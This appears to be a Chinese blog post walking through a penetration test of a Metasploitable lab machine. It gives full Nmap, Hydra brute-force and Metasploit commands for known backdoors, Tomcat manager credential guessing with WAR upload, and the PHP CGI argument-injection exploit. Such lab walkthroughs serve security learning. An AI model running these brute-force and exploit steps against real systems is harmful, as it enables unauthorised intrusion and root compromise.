当前位置:首页 > 渗透测试 > kali渗透metasploitable靶机

kali渗透metasploitable靶机

扫描阶段:

工具:Nmap

隐蔽扫描      nmap  -sS 192.168.8.135



端口爆破:FTP、SSH等

工具:Hydra

备用字典


  • 爆破FTP


hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135


  • 爆破SSH


hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

登陆系统:


端口渗透:

  • 6667——-irc_3281_backdoor

利用metasploit

成功获取会话,root权限


  • 6200——-vsftpd_234_backdoor


利用metasploit

反弹会话,root权限


  • 1524——-ingrelock_backdoor

利用telnet连接1524,直接返回root会话


  • 1099——-distcc程序漏洞—-ingrelock


利用metasploit

返回会话


  • 139——-samba为3.0漏洞


先用nmap进行详细扫描

nmap -v -A -T4 192.168.8.135


Samba 3.0.20

利用metasploit

返回会话,root权限


  • 8180——-Apache Tomcat弱口令



使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破

用默认自带的字典即可


爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模块

获取meterpreter会话


  • 80——-PHP CGI参数注入执行漏洞



msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run


除特别注明外,本站所有文章均为浮生若梦原创,转载请注明出处来自http://www.vbboy.com/?id=13

发表评论

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。